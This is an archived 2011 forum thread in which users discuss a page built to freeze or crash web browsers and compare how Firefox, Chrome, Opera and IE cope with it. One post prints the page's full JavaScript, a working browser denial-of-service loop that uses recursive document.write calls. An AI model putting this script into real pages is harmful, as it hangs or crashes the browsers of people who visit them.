PDA

View Full Version : Firefox: The next IE 6. Why not try [browser here] today?



Agnostic Bear
27-06-2011, 09:00 PM
http://imgbear.com/news.html

This will crash Firefox, I believe it will force ram usage into 2gb+ given enough time.

It will not crash IE, Opera or Chrome. IE will give you a notice saying the script is broken, Opera + Chrome tab will crash leaving your browser otherwise fully functional.

/!\ THIS PAGE (THIS THREAD LITERALLY YOU ARE LITERALLY READING RIGHT LITERALLY NOW THIS HERE RIGHT HERE YOU ARE READING THIS THREAD RIGHT NOW OH NO HAS IT CRASHED ALREADY?) MAY CRASH HXF ON CHROME /!\
If you have pre-loading enabled it'll crash the tab trying to load it. A pretty horrid exploit if you ask me. Gonna throw this into a bug report on Chrome now.

Luke
27-06-2011, 09:19 PM
My firefox won't start anymore..

Jack!
27-06-2011, 10:15 PM
Well, you killed HxF on my PC, but the other tabs were fine? :S

Chrome btw.

Firehorse
27-06-2011, 10:22 PM
IE9 isolates each tab and didn't have any noticeable effect, although facebook refreshed upon closing the page.

jackass
27-06-2011, 10:25 PM
Yeah, HxF crashed, then when I reopened this HxF tab and tryed to post, it crashed my whole Chrome. Very odd. :P

N!ck
28-06-2011, 12:04 AM
Munched a full CPU core and caused Firefox memory to slowly increase at ~500 KB/s - 1 MB/s.


function str_shuffle (str) {
// http://kevin.vanzonneveld.net
// + original by: Brett Zamir (http://brett-zamir.me)
// * example 1: shuffled = str_shuffle("abcdef");
// * results 1: shuffled.length == 6

if (str == undefined) {
throw 'Wrong parameter count for str_shuffle()';
}

var getRandomInt = function (max) {
return Math.floor(Math.random() * (max + 1));
};
var newStr = '', rand = 0;

while (str.length) {
rand = getRandomInt(str.length-1);
newStr += str.charAt(rand);
str = str.substring(0, rand)+str.substr(rand+1);
}

return newStr;
}

function detonate()

{
setTimeout('boom();', 1000);
}

function boom()
{
while(1)
{
explode();
}
}

function explode()
{
str = str_shuffle( 'OISNOn9803j0onaoNG983h2j05203n___8092H4308N__8209 NT098N4208TNnasonBONBONCX' );
str = str.substring(0, 10);
document.write('<script type="text/javascript'+'"'+'>function ' + str + '() { boom(); } ' + str + '();</'+'scr'+'ipt>');
}

detonate();

Flisker
29-06-2011, 04:07 PM
http://i.imgur.com/wvKdB.jpg
Hmm that was after 3 minutes.

Wig44.
30-06-2011, 01:20 AM
http://i.imgur.com/D7buV.jpg

Noscript

Jahova
30-06-2011, 10:20 AM
Uh, so..?

Edited by Infectious (Forum Super Moderator): Please do not make pointless posts!

Chippiewill
30-06-2011, 11:40 AM
Interestingly Chrome didn't have the time to separate the new tab to a new process so it killed this page and the page that opened but nothing else.

N!ck
30-06-2011, 11:45 AM
Uh, so..?

↑↑ Music and Habbo are this way ↑↑

↓↓ Spam and discuss anything are this way ↓↓

Edited by Infectious (Forum Super Moderator): Please do not make pointless posts!

Jack!
30-06-2011, 12:13 PM
Interestingly Chrome didn't have the time to separate the new tab to a new process so it killed this page and the page that opened but nothing else.

That's what happened with me, Just didn't word it to well. :P

Recursion
30-06-2011, 01:18 PM
I got this in Chrome, but only that tab crashed:
http://static02.mediaite.com/geekosystem/uploads/2011/01/chrome-dead-jim-sad-tab.png

Jahova
30-06-2011, 03:29 PM
Ok, I'll expand..

So who cares if it freezes on a website that was designed to make it freeze? Whoop-de-doo.

Agnostic Bear
30-06-2011, 03:45 PM
Ok, I'll expand..

So who cares if it freezes on a website that was designed to make it freeze? Whoop-de-doo.

People that understand how browsers work :)

Want to hide these adverts? Register an account for free!